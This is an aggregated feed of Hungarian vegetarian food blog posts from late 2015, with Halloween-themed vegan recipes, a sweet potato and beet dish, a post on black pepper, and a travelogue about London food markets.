Lassan bugyogni fog, de mivel takarékon van, nem fog leégni. Néha keverjük át. A végén botmixerrel pürésítsük teljesen simára és igazítsunk az ízeken, ha szükséges – én még adtam hozzá egy kevés citromlevet. Tegyük fertőtlenített üvegbe, hagyjuk szobahőmérsékleten kihűlni. Felbontás után tároljuk hűtőben.
Rozs
A rozs a búza és az árpa közeli rokona, mely a honfoglalás óta része a magyar konyhának. Egészségre gyakorolt hatása A rozs magas rosttartalma miatt segíti a bélműködést, illetve a keringési betegségek megelőzésében is fontos szerepet játszik. A mag héjában található anyagok gátolják a koleszterinszintézist, ezáltal fogyasztása elősegíti a vér koleszterinszintjének csökkenését. Kalcium, B1-vitamin, E-vitamin, […] The post Rozs appeared first on VegaNinja.
6 "rémisztő" recept a boszorkánykonyhámból nem csak Halloweenra
2015. november 2. Zöld Avocado
A hétvégém a Halloween jegyében telt, és ezt szeretném megosztani veletek! Ti szerettek vidáman ünnepelni és jókat enni? Én nagyon! ;-) halloweeni sütőtökös keksz A Halloweenról Magyarországon eléggé megoszlanak a vélemények. Sokan úgy gondolják, hogy morbid és a gyerekek számára ártalmas szokás, melyet a Világ számos országában egyre szélesebb körben ünnepelnek. Sokszor tévesen összekeverik a Mindenszentekkel, és nem értik, hogy miért ünnepelnek vidáman az emberek, amikor az elhunyt szeretteinkről kéne megemlékeznünk?! A két ünnep nem egy és ugyanaz! Mindenszentek napját november 01-én tartanak Magyarországon, míg a Halloween-t október 31-én ünnepel a Világ. Halloween napján rémisztő jelmezekbe bújnak kicsik és nagyok, kidekorálják kívül - belül az otthonokat, az üzleteket, az utcákat, a gyerekek "Csokit vagy csínyt" felkiálltásokkal járják a házakat, és gyűjtik a különböző apró édességeket. Sokak szerint ez csak egy újabb kapitalista, vásárlás és eladás központú népbutítás, ami csak a pénzről szól. Van ebben az elméletben is valami... de én máshogy látom. Szerintem ... a Halloween egy újabb nap, amikor a családtagok és a barátok egy közös cél érdekében összefognak, díszítenek, jelmezeket készítenek, sütnek, főznek, ünnepelnek, együtt kilátogatnak és megnézik a település által szervezett jelmezes felvonulást, tűzijátékot. Egy újabb nap, egy újabb alkalom, amikor én a közösségi szellemet, a szeretetet, és az élni akarást érzékelem. Azok az emberek, családok, baráti társaságok, akik ilyenkor jelmezbe bújnak, elfeljtkeznek egy pár órára a mindennapi szerepeiktől, feladataikról, problémáikról. Egy kicsit újra gyerek lesz mindenki, és újra a játékról, a szórakozásról, az élni akarásról szól mindent. Nekem ezt jelenti a Halloween! :-) Egy társasági esemény, egy közösségi élmény, telis tele mókával és kacagással! :-) halloweeni csokis pók muffin Ezekben a napokban jól keresnek-e a kereskedők? Ez nem kétség! De nem csak erről szól a Halloween, mint ahogyan a karácsony sem csak az ajándékokról szól, és a vásárlásról! Miért rémisztő és ijesztő jelmezekkel kell ünnepelni a Halloweent? Ennek is egyszerű oka van! A tradíció miatt. A hagyomány szerint az elmúlt évben meghaltak lelkei október 31-éről november 01-ére virradó éjszakán vándorolnak a holtak birodalmába. Az ijesztő dekorációk, jelmezek, a világító töklámpások pedig elősegítik, hogy a holtak szellemei ne maradjanak a Földön kísérteni, megijedjenek, és távozzanak a holtak birodalmába mindörökre. Zöld Avocado boszorkánykonyha Az ijesztő és rémisztő hangulat rosszat tesz-e a gyerekeknek? Nem hinném! Én mosolyt és vidámságot látok az arcukon, bármilyen országban is járok, és élem át a Halloween ünnepét! Én azt látom, hogy örülnek, mert apa-anya együtt szorgoskodik a gyerek jelmezén, a ház dekorálásán, kísérgetik őket házról házra, amíg édességet gyűjtenek, együtt faragják a töklámpásokat, sütögetik a speciális halloweeni ételeket. Én egy családi programot látok, mely szeretetben és harmóniában tellik el! Még nem láttam kisgyermeket sírni, vagy megrémülni a jelmezek láttán. Még nem tapasztaltam ennek az ünnepnek az árny oldalát, amiről az ünnep ellenzői néha beszélnek. Ez nem azt jelenti, hogy nem létezik árny oldala, de én eddig még csak a jó oldalát láttam, és az általa létrehozott szeretetet! :-) Így hát, amikor csak tehetem, én is nagy szeretettel veszek részt egy-egy halloweeni mulatságon, játékos baráti összejövetelen, sürgök-forgok a konyhában, és készítem az alkalomhoz illő, de reform édességeket, ételeket. Most is készült néhány recept a Zöld Avocado vegetáriánus gasztroblog boszorkánykonyhában, amit nagyon szívesen megosztok veletek. Még jól jöhet a következő Halloween party-ra, vagy a rémisztő kiegészítők nélkül, hagyományos, egész évben az asztalra tehető ételeket készíthetünk belőlük. Fogadjátok sok szeretettel őket! ;-) halloweeni sütőtökös keksz (laktózmentes, tojásmentes, vegán) HALLOWEENI SÜTŐTÖKÖS KEKSZ HOZZÁVALÓK (kb. 30 db-hoz) - 400 g sütőtök püré (párolt vagy sült sütőtök húsa kikaparva) - 300 g teljeskiőrlésű tönköly búza liszt - 1 ek őrölt fahéj, 1 tk őrölt szerecsendió, 1 kk őrölt szegfűszeg - 1 tk szódabikarbóna - 1/2 tk Himalája só - 120 g tetszés szerinti édesítőszer (pl.: barna nádcukor, nyírfacukor, eritrit stb.) - 2 ek őrölt lenmag + 6 ek víz (azaz 2 vegán tojás) - 200 ml repce olaj vagy olívaolaj - - csokikrém a dekorációhoz: 50 g olvasztott ét csokoládé és 1 ek kókuszolaj ELKÉSZÍTÉS A természetes tojáshelyettesítőhöz a frissen darált lenmagot elkeverjük a vízben, majd hagyjuk egy 15 percet állni, kocsonyásodni. Ezután mehet bele a tésztába. A hozzávalókat összekeverjük, majd tetszés szerinti formában a sütőpapírra helyezem. Én ezesetben egy nagyobb pogácsa szaggatót használtam. A tészta zsíros, nem lehet kinyújtani és kiszaggatni. Egy evőkanál segítségével megtöltöttem a pogácsa szaggatót, amit a sütőpapírra helyeztem. Majd felemeltem a szaggaótt, odébb helyeztem, kanállal újra töltöttem... és így tovább. A végén csodaszép szabályos, és kerek kekszeket kapunk. Mivel most szerettem volna, hogy töklámpás formája legyen, ezért kézzel kicsit rásegítettem a szép kerek formákra. De ha nincs Halloween, hagyjuk őket szabályos kekszként, és süssük meg őket kb. 10 perc alatt, 180 ° C fokos sütőben. Kihűlés után, nagyon finom, és puha kekszeket majszolhatunk még napok múlva is. Megjegyzés: A sütőtök édes ízétől függően változtathatunk a hozzáadott édesítőszer mennyiségének. Az általam használt mennyiség, édes sütőtök püréhez lett megadva. halloweeni mini pizza oliva pókokkal (gluténmentes, tojásmentes) HALLOWEENI MINI PIZZA HOZZÁVALÓK (kb. 40 db mini pizzához) - kemény sajt - fekete olíva bogyó pizza tésztához: - 350 g gluténmentes kenyérliszt - csipet Himalája só, 1 tk őrölt oreganó - 2 dl langyos víz - 1/2 tk szódabikarbóna - csipet Himalája só - 2 ek extra szűz olívaolaj - 1 ek őrölt lenmag (elhagyható) paradicsomszószhoz: - 200 ml paradicsom püré (cukormentes) - 1 marék friss bazsalikom - Himalája só, őrölt fekete bors, csipet őrölt chili fűszer - 3 gerezd fokhagyma ELKÉSZÍTÉS A pizza tésztához valókat összegyúrjuk, majd félretesszük meleg helyre pihenni 1 órát. A kissé megkelt tésztát ketté választjuk, majd lisztezett deszkán kinyújtjuk. Kör alakú szaggatóval kiszaggatjuk a mini pizzákat, és sütőpapíron előmelegített sütőbe tesszük őket. 180 °C fokon 5 perc alatt elősütjük a kis pizza lapokat, majd kivesszük hűlni. Ezt elvégezzük a másik fél nyers tésztával is. Közben elkészítjük a szószt. A paradicsompürét egy edénybe feltesszük a tűzhelyre forrni. Beleszórjuk az apróra vágott fokhagymát, a fűszereket, és egy marék friss bazsalikom levelet apróra vágva. Közepes lángon 5 percig főzzük, folytonos kevergetés mellett, majd félretesszük a tűzhelyről. Az elősütött mini pizza lapokat vastagon megkenjük a paradicsomszósszal, majd rátesszük a kemény sajtból szaggatóval szaggatott sajt karikákat. Az olíva pókokhoz előre feldaraboljuk a fekete olíva bogyókat. Szükség lesz a póktesthez félbe vágott olíva bogyóra, a lábakhoz, olíva bogyó csíkokra, és a fejhez apróra vágott olíva bogyóra. Ez egy jó kis türelemjáték. Egyesével összeállítani a pókokat a pizza lapocskán. Érdemes segítséget venni magunk mellé, és akár a gyerekeket bevonni, ha nem szeretnénk órákat állni a konyhában. Miután elkészültünk velük, mehet vissza az előmelegített sütőbe, és 180 °C fokon kb. 10-15 perc alatt készre sütjük a mini pizzákat. Tökéletes vendégváró falatka, mert szobahőmérsékleten is nagyon finom, így az est egész ideje alatt lehet belőle jóízűen falatozgatni. Megjegyzés: Próbáljunk meg olyan kemény sajtot választani, ami nem olvad szét túlzottan, mert akkor a gondosan összerakott pókjaink szétcsúsznak. Reszelt parmezánt is használhatunk. halloweeni csokis pók muffin (gluténmentes, laktózmentes) HALLOWEENI NAGYON CSOKIS PÓK MUFFIN HOZZÁVALÓK (kb. 12 db-hoz) - 75 g darált zabpehely (gluténérzékenyeknek szigorúan gluténmentes) - 75 g darált mandula / mandula liszt - 3 ek jó minőségű sötét kakaó por - 80 g tetszés szerinti édesítőszer (pl.: barna nádcukor, nyírfacukor, eritrit stb.) - 1/2 tk szódabikarbóna - csipet Himalája só - 2 marék dió / pekán dió - 100 g ét csokoládé - 100 g bio növényi margarin - 2 db érett banán - 2 db bio tojás dekorációhoz: - aszalt szilva, pók fejnek - fekete szívószál, pók lábaknak - fehér csokoládé, keresztnek a pók hátára ELKÉSZÍTÉSA szilárd hozzávalókat összekeverjük, és beleszórjuk a durvára vágott dió féléket. Egy edényben megolvasztjuk a margarint az összetördelt étcsokoládéval. A banánt leturmixoljuk a tojással, vagy csak villával összetörjük pépessé. A diós szilárd hozzávalókat összekeverjük a pépesített banános tojással, és a vajas folyékony ét csokoládéval. Fakanállal csomómentesre keverjük a muffin tésztát. Elővesszük a muffin sütőt, és beletöltögetjük a muffin papírba a tésztát. (Én még enyhén ki is szoktam kenni a papírokat belülről kókusz olajjal, hogy biztosan könnyedén le tudjam venni majd a kész süteményről.) 180 °c fokra előmelegített sütőben 25 perc alatt készre sütjük a nagyon csokis muffinokat. A szívószálak segítségével lábakat adhatunk a póknak, illetve egy kb. 1,5 cm-es szívószál darab segítségével rögzíthetjük a pók fejét is. Ehhez szükség lesz 1/2 db aszalt szilvára, amit felnyársalunk a szívószál darabkára, és beleszúrjuk a pók testbe, a muffinba. A fehér csokoládét gőz felett felolvasztjuk, és keresztet rajzolunk a pók testre. halloweeni kecskesajtos quinoával töltött paprika (gluténmentes, tojásmentes) HALLOWEENI KECSKESAJTOS QUINOA SALÁTA PAPRIKÁBA TÖLTVE HOZZÁVALÓK (6 db - hoz) - 6 db színes kaliforniai paprika - 1/2 bögre quinoa - 1 bögre tiszta víz - 150 g kecskesajt vagy görög feta sajt - tetszés szerinti zöldségek pl.: 1 marék retek, 1/4 lila hagyma, 1/2 avokádó, 1 bögre előfözött kukorica, 2 szál újhagyma, 1 marék mungóbab csíra - 1 marék dió Himalája só, frissen őrölt fekete bors - sörélesztőpehely (elhagyható) ELKÉSZÍTÉSA quinoát dupla mennyiségű vízben, a rizshez hasonlóan kifőzzük. Fajtától függően elég neki kb. 20 perc. A tetszés szerinti zöldségeket apróra felvágjuk, felkockázzuk a kecskesajtot, vagy feta sajtot, durvára vágjuk a diót, és összekeverjük az egészet egy kevés sóval és borssal. A kihűlt és megfőtt quinoát összekeverjük a zöldséges sajttal, és kész is a töltelék. A megmosott, színes paprikáknak levágjuk a tetejüket, úgy, hogy hozzáférjünk a belsejükhöz. Kézzel kiszedjük a magos csumát, és az ereket. Kitisztítjuk a paprika "fészket". Ha Halloweeni kinézetet szeretnénk, egy kicsi, de hegyes késsel faragjunk szemeket, szájat, és orrot a paprika "arcoknak". A zöldséges, sajtos, quinoa tölteléket bele kanalazzuk a paprikákba, és már tálalhatjuk is a vendégek elé a Halloween-i asztalra. Megjegyzés: A diót minden esetben fogyasztás előtt érdemes min. 24 órára beáztatni, hogy az emésztést gátló enzimgátlók kioldódjanak belőle. Sokkal egésszégesebb lesz így. halloweeni sütésmentes boszi ujjak (gluténmentes, laktózmentes, tojásmentes, hozzáadott cukormentes, nyers, vegán) HALLOWEENI BOSZI UJJAK HOZZÁVALÓKsötétbarna ujjak (kb. 10 db) - 100 g datolya - 2 ek chia mag - 2 ek karob por - 2 ek kókuszolaj - darált mandula, amennyit felvesz (min. 50 g) - "köröm": vágott mandula szeletek világos ujjak (kb. 10 db) - 100 g datolya - 1 db bio citrom reszelt héja (kezeletlen héjú) - 1/2 ek útifűmaghéj - 2 ek kókuszolaj - darált mandula, amennyit felvesz (min. 100 g) - "köröm": héjas egész mandula szemek ELKÉSZÍTÉSA datolyát előző éjjelre áztassuk be, hogy könnyebb legyen vele dolgozni, ne legyen olyan kemény. Amikor készítjük a receptet, tegyük az ázott, áztató víz nélküli datolyát a darálóba, és daráljuk meg egy kicsit. Datolya lekvár szerű állagot szeretnénk kapni. A hozzávalókat tegyük egy tálba a datolya "lekvárral", és kézzel gyúrjuk össze. A darált mandulát fokozatosan adjuk hozzá, annak függvényében, hogy mennyit vesz fel a tészta. A cél, egy gyurmázható, formázható állagú nyers tészta. Ha ezt elértük, sodorjunk a tenyerünkkel "ujj"-szerű rudakat, majd kézzel formázzunk bele ujj csontot. Amint elértük a kívánt külalakot, tegyük rá a "körmöt", majd mehetnek a sütésmentes, mindenmentes, édes, ehető ujjak a fagyasztóba. Fogyasztás előtt tegyük ki őket az asztalra, és kb. 30 perc alatt kiolvadnak, és már ehetőek is a bizarr harapnivaló ujjacskák. ;-) Megjegyzés: Ha nincs Halloween, formázzunk a tésztákból golyókat, és így egész évben fogyasztható egyszerű édességeket kapunk, amit akár napokkal előtte elkészíthetünk, mert a fagyasztóban tárolva eláll. halloweeni friss zöldségsaláta (gluténmentes, laktózmentes, tojásmentes, nyers, vegán) HALLOWEENI FRISS ZÖLDSÉGSALÁTA (gluténmentes, laktózmentes, tojásmentes, nyers, vegán) Ez egy nagyon egyszerű zöldségsaláta, azoknak, akik valami frissre, és energiadúsra vágynak, a sok sok halloweeni nassolás között. Természetes és natúr ízek, hogy felfrissítsük kicsit a gyomrunkat. Önmagában, és köretként is fogyasztható. HOZZÁVALÓK - tetszés szerinti zöldségek pl.: jégsaláta, újhagyma, kígyó uborka, koktél paradicsom, retek, paprika, csíra, avokádó, cékla, alma stb. - tetszés szerinti natúr magok pl.: napraforgómag, tökmag, fenyőmag stb. - egyéb extra íz- és tápanyagérték fokozók pl.: sörélesztőpehely, kendermag stb. (elhagyható) - - dekoráció: Sárgarépa töklámpás, és cukkini szellem ELKÉSZÍTÉSA tetszés szerinti zöldségeket tetszés szerinti méretben felaprítjuk, és összekeverjük. Törekedjünk színes salátát készíteni, és legyen benne lédús zöldség is (pl.: paradicsom.) Adjuk hozzá a tetszés szerinti magokat, vagy super ételeket. A sörélesztőpehely finom, sajtszerű zamatot kölcsönöz a salátáknak. Hagyjuk állni a hűtőben min. egy órát, hogy az ízek jól össze érjenek. Halloweeni hangulathoz készítsünk dekorációt a salátára. Vastagabb (nyers) sárgarépából vágjunk karikákat, és faragjunk belőle töklámpás arcokat. Nyers cukkiniből hosszábban vágjunk le kb. 10 cm hossz, és 0,5 cm magas lapokat. Faragjunk belőle szellemszerű formákat. halloweeni kecskesajtos quinoával töltött paprika TÁPLÁLKOZZUNK, NE CSAK ÉTKEZZÜNK, MÉG HALLOWEEN IDEJÉN IS! ;-) Remélem sikerült néhány ötlettel megajándékozni titeket! A halloweeni formázások nélkül minden itt megjelent recept elkészíthető, hagyományos változatban, az év minden napján. Kellemes konyhatündérkedést, és vidám ünnepeket kívánok! "A töklá mpás legendája Egy ír legenda szerint nevét egy Jack O'Lantern nevű részeges kovácsról kapta. A legenda szerint egy szép napon odament a részeges Jackhez az ördög és hívta a pokolba, de előtte felajánlotta, hogy igyanak még meg egy italt. Jack azonban nem akart vele tartani, ezért hát furfangos cselt eszelt ki. Ravasz módon megkérte, hogy válasszon egy almát az almafájáról, mire az ördög felmászott a fára. Jack tudta, hogy mitől fél az ördög, ezért a fa oldalára egy keresztet rajzolt. Az ördög nagyon megrettent a kereszttől és nem is mert lemászni, kénytelen volt a fa ágán kucorogni. Az ördög addig-addig egyezkedett a furfangos kováccsal, míg az megígértette vele, hogy ha leengedi a fáról, cserébe gondoskodik róla, hogy Jack (aki életében sok rosszat tett) ne kerüljön a pokolba. Jack ekkor megengedte hogy lemásszon a fáról az ördög - aki abban a pillanatban el is tűnt. Azonban amikor Jack meghalt, lelke a menny és a pokol között rekedt: a mennybe nem engedték be, mivel élete során sokat részegeskedett és bűnös módon élt, de az ördög sem akarta a pokolba befogadni, mert nagyon haragudott Jackre a régi csínye miatt. Jack arra kérte az ördögöt, hogy legalább egy kis fényt adjon neki, hogy megtalálja a visszautat az élők világába. Végül az ördög megszánta és egy örökké izzó fadarabot dobott Jacknek a pokol katlana alatt lobogó tűz parazsából, amit nyugtalan lelkének szánt. Az izzó parazsat Jack egy kivájt takarmányrépa (rutabaga, svéd karórépa) belsejébe tette világító lámpásnak, s azóta lelke ennek a takarmányrépa-lámpácskának a fényénél keresi megnyugvását." Forrás: Wikipédia töklámpás fesztivál
Sült édesburgonya céklával
Édesburgonyának hívjuk, pedig a burgonyához nem sok köze van, legfeljebb, hogy gumós növény, de a hajnalka virágokhoz már inkább, mert a hajnalka nemzetségébe tartozik. Batátának is hívják még. Magyarországon már elég elterjedt, nem csak nagyobb szupermarketek zöldséges polcain találkozhatunk vele, hanem bizonyos termelők kertjében is megterem. Angliában szinte minden zöldségárusnál vásárolhat az ember. Általában egy kilónyit 1 fontért adnak. Ha céklánk és egy kis lila hagymánk is van zseniális őszi ételt lehet alkotni belőlük. Az édesburgonya amúgy ízre, színre leginkább a sütőtökhöz hasonlítható. Megtévesztésig hasonló ízű. Vasban, káliumban, A-, B6-, C-vitaminokban gazdag. Nevével ellentétben cukorbetegek is fogyaszthatják, alacsony a glikémiás indexe. Céklával és lila hagymával párosítva egészséges őszi ételben lehet részünk. A recept: Hozzávalók: - 3-4 édesburgonya - 5-6 cékla - 2 lila hagyma - 3-4 gerezd fokhagyma - kakukkfű - ételízesítő/só - víz - kókuszolaj - alufólia Elkészítés: Az édesburgonyákat és a céklákat megpucoljuk, kockákra vágjuk és külön lábosba, sós vízben feltesszük főzni. Addig főzzük, míg épp egy kicsit megpuhulnak. Közben a hagymákat megpucoljuk, a fokhagymát felaprítjuk, a lila hagymát szeletekre vágjuk. Fogunk egy kisebb tálat, folyékony kókuszolajat, kakukkfűvel, aprított vagy szétpréselt fokhagymával és ételízesítővel összekeverjük, majd hozzáöntünk pár kanál meleg vizet. Ezt a fűszeres lét összekeverjük, majd egy nagyobb tálban az édesburgonyára és a céklára ráöntjük, átkavarjuk, így mehet a zöldség a tepsibe (sütőpapír híján most alufóliát tettem alá), elterítjük benne, a tetejére rászórjuk a lila hagyma szeleteket, majd betesszük sütni. 15-20 perc sütéssel összeérnek az ízek. A kakukkfű a legfontosabb fűszer hozzá. Főtt gabonához is fogyaszthatjuk, vagy ezekhez a sült zöldségekhez valamilyen fasírtot is ehetünk, de magában is nagyon finom.
A feketebors hatásai
2015. október 26. Élj harmóniában
A feketebors az ókortól ismert gyógynövény. Mára már a magyar konyhának is mindennapi fűszere, de kevesen tudják, hogy mennyi fantasztikus hatása van. Ez az egyik legerőteljesebb serkentő, hat a testre és a elmére. A feketebors hatással van az emésztésre, vérkeringésre és a légzésre is. Segíti az emésztést, megakadályozza az elhízást, szélhajtó hatása van, így jó puffadás ellen. Amikor valakinek állandó emésztési problémái vannak, nagyon jó hasznát veheti a feketeborsnak, még a vastagbélben felhalmozódott mérgeket is segít kiűzni, eltávolítja a testből az "ama"-t (azaz méreganyagokat). Féreghajtó hatással is rendelkezik. Nem csak az emésztés, de a légzőszervek megbetegedésénél is hasznát vehetjük. Nyákoldó hatása van és segít a testüregekben lévő pangást megszüntetni. Mézzel fogyasztva nagyon jó köptető, leállítja a váladéktermelést. Enyhe lázcsillapító hatással is rendelkezik. Serkenti a keringést, ezért hideg végtagok esetén is érdemes rendszeresen fogyasztani. Az ájurvédában a trikatu, azaz 3 csípős egyik alkotóeleme - a hosszúborssal és a gyömbérrel együtt. Ne használd akkor, ha az emésztőrendszernek valamilyen gyulladásos megbetegedése van. Vegyszermentes (bio) változatot válassz!
Vegetáriánus receptek a Bükk mellől
2015. október 22. Vegetáriánus receptek
Napjainkban egyre többen döntenek úgy, hogy teljesen vagy részlegesen, de száműzik a húst étrendjükből. Sokan kényszerből, míg mások meggyőződésből fordulnak a vegetáriánus étrend felé. Az átlag magyar ember számára elérhető éttermek kínálata azonban meglehetősen egysíkú: a rántott sajton, a rántott karfiolon és néhány salátán kívül még néhány ételben ki is merül a kínálat.
Ezen a helyzeten túlmutatva kínálunk alternatívákat egy saját tapasztalatokon nyugvó kiadvánnyal. Az egyéni hangvételű könyv érdekessége, hogy az izgalmas ételek otthon is könnyen elkészíthetőek, hiszen többségében a háztartásokban is megtalálható, hétköznapi alapanyagok felhasználásával nyújt segítséget a vegetáriánus étrend szerelmeseinek. Az indiai, az olasz és a magyar konyha jellegzetességeit is magukban hordozó fogások garantáltan feldobják a család étrendjét.
A recepteket egy elektronikus kiadványba rendeztük és szokatlan módon, szembemenve az aktuális trendekkel, teljesen ingyen adjuk (és még csak az e-mail címedet sem kérjük el).
Ha vegetáriánus vagy, akkor töltsd le a legújabb, ingyenes receptkönyvet, és egyél olyan jókat, mint még soha! Ha nem vagy vegetáriánus, akkor pedig azért töltsd le! Meglátod: van élet a húson túl!
A kiadvány e-book formátumban tölthető le a http://vegetarianusreceptek.hu/a-konyv oldalról.
De addig is: lapozz bele!
Londoni gasztroélményeim
Hosszabb hallgatásomnak nyomós oka van, amit ezennel megtörök. Ahogy azt a (fehér)cukortól (általam hozzáadott más cukortól is) mentes meggylekvár írásom elején jeleztem, változás előtt álltunk, ami szeptember hónapban be is következett. A változás nem más, mint egy időre Londonba költöztünk, férjemmel itt próbálunk meg talpon maradni, élni, főzni, enni. Az itt ért (leginkább gasztro) benyomásokból szeretnék most egy képes beszámolót adni minden kedves olvasómnak. A képen a Hyde Park részlete látható. Londonban rengeteg park van. Bizonyára az egyik legzöldebb világváros. Még nem tudom, mennyi ideig leszünk ebben a városban, távlati célunk ugyanis egy kisebb (Budapestnél is kisebb) város lenne, például Bristol, vagy Brighton, de egyelőre most London-t kell megélnünk. Mindenekelőtt el kell mondjam, hogy a legokosabb döntésem volt, kihozni magunkkal a turmixgépet (itt ugyanazt a típust láttam egy kirakatban, kb. 8.000 forinttal drágábban), piros fűszerpaprikát, hajdinát, zabot, stb. Nem bántam, hogy ezek által kevesebb ruha fért be a táskánkba, viszont nagyon szuper, hogy a turmixgépet tudom használni, és nem itt kell felkutatnom egy minőségit elfogadható áron. Zabot és hajdinát pedig egyszerűen sehol nem látok. (Zabpehely persze van.) Mielőtt kijöttünk volna ide, az utolsó pénteken még kilátogattam a Bosnyák piacra, vettem egy-két finom hazai gyümölcsöt, s közben azon gondolkodtam, vajon itt, Londonban hogyan fogok boldogulni a nyers ételek beszerzésével. Valószínű, a legtöbb zöldség-gyümölcs import áruként kerül az országba (sajnos). London városában járva kelve láttunk néhány zöldségest, de igazibb piacot, ami otthon is van (pl. Fővám téren vagy az előbb említett Bosnyák téren) mindeddig kettőt sikerült úgy igazán felfedeznem. Az elsőt Whitechapel Station megállóból kijövet láttam meg, s hazafelé természetesen megálltam, s jól bevásároltam. A második pedig Dalston Junction megállónál van. Mindkét helyen már többször voltam, képeket is "hoztam". Az érdekessége e két piacos placcnak számomra az, hogy egyetlen overground járattal összekapcsolható a kettő. Igaz, egy kicsit gyalogolni kell, mert Dalston Junction-nál leszállva egy nagyobb saroknyi utat kell megtenni Dalston Kingsland-ig, amivel szemben helyezkednek el a kirakodók. Whitechapel Station közelében lévő árusoknál nagyon sok különleges dolgot láttam, amikről nem tudom pontosan, mi is az. (Ha bárki a képeken látja és be tudja azonosítani, írjon nyugodtan!) Sok jamaikai-t láttam arra, bár az is igaz, hogy a közelben van ugyanakkor a londoni muszlimok központja is, a kelet londoni mecsettel. Nagyon érdekelnek azok a növények, amelyeket lefotóztam, s Magyarországon nem igazán ismertek. Kíváncsi vagyok, milyen ételeket lehet belőlük készíteni, melyik nemzet konyhájának specialitásai. Szívesen megtanulnék egy-két vegán ételt más ízek hazájából. Időm egyelőre nem engedte, hogy az interneten felfedezzem a recepteket. Dalston Juction piacánál csak egy dolgot emelnék ki, hogy bizonyára több eladó árulja a portékát, mint Whitechapel-nél mivel akár 4 sort is alkotnak egymás mögött az árusok. Mindkét helyen nem csak élelmiszert, hanem ruházatot, konyhai felszereléseket, fűszereket is árulnak. Dalston Kingsland piacán változó, hogy milyen árus van gyakrabban. Amikor csütörtökön jártam arra, akkor meglehetősen sok zöldséget, gyümölcsöt árusító "kofa" volt, pénteken pedig főként ruhákat árultak, csak kevés zöldséges volt. Szintén mindegyik helyen halas is van, elsősorban tengeri halakat láttam, bár annyira alaposan nem vettem szemügyre. Hentes árukat is be lehet szerezni, de ezek már boltokban vannak, amelyek fixen vannak nyitva, szinte minden nap. Whitechapel-nél láttam néhány üzletet, ahol a keleti világ édességeit árulják - a képeken ezeket is bemutatom. Bevallom, a pisztáciás zöld akármi kicsit érdekel. A városban másfelé járva szintén láttam ilyen boltokat, de még nem szakítottam időt arra, hogy megkérdezzem a bolti dolgozót, hogyan készül és miből van. Tartok tőle, hogy tele van cukorral... :( Magyar nyelvű útleírásokban, turista-információkban nem nagyon találkoztam ezzel a két hellyel, Borough Market-tel pedig annál inkább. Nos véleményem szerint a Borough Market valódi turistáknak való látványosság. Számomra inkább sznobizmus jut róla eszembe, no meg egyfajta gasztrofesztivál állandósított helye, de a hétköznapi bevásárláshoz minden bizonnyal nem a legjobb hely, főként egy vegán vagy vegetáriánus illetőnek. Azért is elsősorban turistáknak ajánlom, mert különlegesebb dolgokat lehet ott beszerezni, illetve a hely egy kisebb részén találhatunk friss zöldséget, gyümölcsöt, nagyobb területén inkább kész-ételt (sósat, édeset, pékárut, sajtféléket, borokat, olajokat, stb.) lehet vásárolni. Ezért gondolom róla azt, hogy egyfajta állandó gasztrofesztivál helyszíne. S hát igen, mi nem tartozunk azok közé, akiknek ez az árfekvés kedvező lenne. (Csak egy példa: répa, narancs és citromból helyben készített 100%-os 2.5 dl ital ára 2,5 font. Középárfolyamon egy font 420-430 forint, tehát a 2,5 dl ital ára cirka 1000 forint). Végezetül jöjjenek a képek, amelyek szerintem többet is elárulnak, mint amennyit én próbáltam összeállítani. :) Whitechapel market: Cím: Whitechapel Rd Tower Hamlets London E1 5BS Nyitva tartás: Hétfőtől szombatig 8:00-18:00 Gyümölcsök és zöldségek Whitechapel Market-on: Egy angol nyelvű vélemény Whitechapel Marketról (2010-ből, de ma is aktuális) az egyik, piacokról (is) szóló oldalról: "I dont understand why the other reviewers were so down on this lovely bit of commerce on Whitechapel. Where else can you get a box of 10 mangoes for 3 pounds? Maybe in Mexico, amigo. But NOWHERE else in London. Similarly, 3 bunches of coriander (AKA cllantro) for 1 pound? Great prices on exotic foods. And I bet you can bargain, though Ive never tried because things are so cheap already. There are probably 50 stalls in this market, some selling lingerie, others selling fish, and others focusing on the bollywood dvd scene. Its all good. For cheap produce though, you cant beat it. If youre more into the Borough market thing, go down there and drink your latte while you push your three-wheel stroller. If youre more into good cheap food from nice folks (without the marketing) go to Whitechapel." Lényegében azt fejezi ki az írója, hogy nem érti, miért húzzák le ezt a pompás kis kereskedelmi helyet mások. Hol máshol tudsz egy doboznyi (10 db) mangót 3 fontért venni? Sehol máshol. Szerinte még talán alkudni is lehet, amire neki nem volt szüksége, mert minden olyan olcsó. Nagyjából 50 árusító hely van, s felsorolja, mi mindent lehet ott vásárolni. Végül azzal fejezi be mondandóját, ha többet akarsz tudni a Borough market-ről, menj csak el oda, idd meg a tejeskávédat, ..., de ha inkább érdekelnek az olcsó ételek a kedves helybéliektől, akik ráadásul nem is reklámozzák portékáikat, akkor menj Whitechapel-re! Az overground megállója kívülről és egyéb élelmiszerek: Dalston Kingsland (Dalston Juction): Cím: Kingsland High Street London E8 2JS Nyitvatartási időt nem tudok. (Lehet, hogy ez az overground alapban elmegy Kingsland megállóig, de eddig minden alkalommal Juction volt a végállomás, amikor Whitechapel felől közelítettem meg.) Borough Market: Cím: 8 Southwark Street London SE1 1TL London Bridge Nyitva tartás: Hétfőtől szombatig 10:00-17:00 Pékáruk a Borough Market-en: Zöldségek, gyümölcsök, csonthéjasok ugyanitt: Egyéb (kész)ételek:
Tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán)
2015. október 13. Zöld Avocado
tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) A tél közeledtével egyre sűrűbben előkerülnek a leveses fazekak, a mélytányérok. A magyarok nagy levesfogyasztó nemzet hírében állnak, ami a hideg idővel még igazabbá válik. El sem tudjuk képzelni a vasárnapi ebédet, vagy egy ünnepi menüsort, leves nélkül! :-) Pedig sok milliárd ember számára nem olyan természetes a levesek rendszeres fogyasztása, mint számunkra. Ha pedig beköszönt az ősz, még szívesebben kanalazgatunk egy-egy forró zöldséglevest, krémlevest, vagy akár egy tartalmas babgyulást. A nyáron sokkal több friss és lédús gyümölcshöz és zöldséghez jutunk, mint télen, így a téli folyadékpótlás nagy részét ilyenkor a levesek biztosítják. Mi magunk is nagyon szeretjük őket. Gyakran készítek hamis gulyásokat, például csicseriborsóval (hús helyett), lencsével, vagy az egyik nagy kedvencünket, a babgulyást. Amióta megismerkedtem az adzuki babbal, előszeretettel készül a konyhámban adzuki babos gulyásleves mindenki nagy örömére. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Az adzuki bab Kelet - Ázsia közkedvelt alapanyaga, ahol nem csak leveseket és salátákat 